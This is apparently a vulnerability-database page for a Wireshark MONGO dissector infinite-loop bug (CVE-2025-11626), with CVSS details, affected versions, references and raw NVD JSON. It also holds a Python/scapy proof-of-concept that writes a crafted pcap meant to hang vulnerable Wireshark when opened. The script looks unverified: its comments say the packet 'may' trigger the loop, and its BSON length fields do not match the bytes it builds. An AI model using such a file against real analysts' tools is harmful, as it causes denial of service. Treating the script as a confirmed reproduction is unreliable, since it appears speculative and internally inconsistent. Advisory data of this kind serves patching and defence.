CVE-2025-11626

Description

MONGO dissector infinite loop in Wireshark 4.4.0 to 4.4.9 and 4.2.0 to 4.2.13 allows denial of service

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE

Wireshark >= 4.4.0, < 4.4.10

Wireshark >= 4.2.0, < 4.2.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11626 PoC - Wireshark MONGO Dissector Infinite Loop
# This PoC demonstrates how to craft a malicious pcap file that triggers
# an infinite loop in the Wireshark MONGO dissector (versions 4.4.0-4.4.9 and 4.2.0-4.2.13)

from scapy.all import *
import struct

def craft_mongo_malicious_packet():
    """
    Craft a malicious MongoDB Wire Protocol packet that triggers
    infinite loop in Wireshark's MONGO dissector.
    """
    # MongoDB Wire Protocol message header format:
    # - messageLength (4 bytes, little-endian int32)
    # - requestID (4 bytes)
    # - responseTo (4 bytes)
    # - opCode (4 bytes)

    # OP_MSG opcode = 2013
    op_code = 2013

    # Construct message body that causes infinite loop in dissector
    # The key is to craft a message with nested structures that
    # cause the parser to loop indefinitely
    msg_body = b'\x00'  # flagBits
    # Section with kind 0 (body)
    msg_body += b'\x00'
    # Craft a document with recursive-like structure
    # BSON document that may trigger infinite parsing loop
    bson_doc = b'\x10\x00\x00\x00'  # document length
    bson_doc += b'\x03'  # type: document
    bson_doc += b'\x61\x00'  # key: "a"
    bson_doc += b'\x0e\x00\x00\x00'  # nested doc length
    bson_doc += b'\x03'  # type: document
    bson_doc += b'\x62\x00'  # key: "b"
    bson_doc += b'\x05\x00\x00\x00'  # innermost doc
    bson_doc += b'\x00'  # null terminator
    bson_doc += b'\x00'  # null terminator

    msg_body += bson_doc

    # Total message length = header(16) + body
    msg_length = 16 + len(msg_body)

    # Construct full MongoDB message
    header = struct.pack('<I', msg_length)  # messageLength
    header += struct.pack('<I', 1)  # requestID
    header += struct.pack('<I', 0)  # responseTo
    header += struct.pack('<I', op_code)  # opCode

    mongo_packet = header + msg_body
    return mongo_packet

def create_poc_pcap(filename='cve_2025_11626.pcap'):
    """
    Create a pcap file with the malicious MongoDB packet.
    When opened with vulnerable Wireshark (4.4.0-4.4.9 or 4.2.0-4.2.13),
    it will trigger an infinite loop in the MONGO dissector.
    """
    mongo_data = craft_mongo_malicious_packet()

    # Wrap in Ethernet/IP/TCP frame to simulate MongoDB traffic
    # Default MongoDB port is 27017
    pkt = Ether(dst='00:00:00:00:00:00', src='00:00:00:00:00:00') / \
          IP(src='192.168.1.1', dst='192.168.1.2') / \
          TCP(sport=12345, dport=27017) / \
          Raw(load=mongo_data)

    wrpcap(filename, [pkt])
    print(f"[+] PoC pcap file created: {filename}")
    print(f"[+] Open this file with vulnerable Wireshark to trigger CVE-2025-11626")

if __name__ == '__main__':
    create_poc_pcap()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11626
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11626
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11626/
[4] VulDB https://vuldb.com/cve/CVE-2025-11626
[5] https://gitlab.com/wireshark/wireshark/-/issues/20724
[6] https://www.wireshark.org/security/wnpa-sec-2025-04.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11626", "sourceIdentifier": "[email protected]", "published": "2025-10-10T23:15:35.207", "lastModified": "2025-12-03T19:32:45.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MONGO dissector infinite loop in Wireshark 4.4.0 to 4.4.9 and 4.2.0 to 4.2.13 allows denial of service"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndExcluding": "4.2.14", "matchCriteriaId": "E919B357-3B17-4C7D-AC1A-C519EA7876C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.10", "matchCriteriaId": "CAC73AB6-C303-43F8-9C04-8A1626C810D2"}]}]}], "references": [{"url": "https://gitlab.com/wireshark/wireshark/-/issues/20724", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.wireshark.org/security/wnpa-sec-2025-04.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}